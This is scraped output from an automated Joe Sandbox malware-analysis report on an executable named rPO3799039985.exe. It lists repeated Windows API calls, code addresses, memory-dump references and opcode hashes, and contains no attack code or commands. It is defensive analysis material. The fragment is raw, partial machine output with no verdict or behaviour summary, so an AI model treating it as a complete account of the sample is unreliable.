• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                          • Opcode ID: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                                                                                                                          • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                                          • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040502A
                                                                                                                                                                                                            • Part of subcall function 00403F60: SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                                                                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 00405076
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2896919175-0
                                                                                                                                                                                                          • Opcode ID: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                                                                                                                          • Instruction ID: 3bb1638c4cb192e16dfd02cc67da28ccb22f822f40d61e8a5dd6919248452ec0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F02473A041018BE3616B259C00B5B77A0EB88301F14003AFE44732E1DA3A59028AAE
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                                            • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                                                                                                            • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                                                                                                                            • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                          • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                                          • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                                          • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                                                          • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040549F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                          • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                          • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                          • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                          • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PathSearch
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2203818243-0
                                                                                                                                                                                                          • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                                                                                                                          • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                                          • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: FileWrite
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
APIs
• SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
APIs
• SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2492992576-0

• Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
• Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
• Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
• Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
APIs
• Sleep.KERNELBASE(00000000), ref: 004014E5
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0

• Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
• Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
• Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
• Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004048DD
• GetDlgItem.USER32(?,00000408), ref: 004048E8
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
• LoadBitmapA.USER32(0000006E), ref: 00404945
• SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
• SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
• SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
• DeleteObject.GDI32(00000000), ref: 004049BB
• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
• SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
• SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
• GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
• ShowWindow.USER32(?,00000005), ref: 00404B14
• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
• SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
• SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
• SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
• SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
• ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
• GlobalFree.KERNEL32(00000000), ref: 00404CF4
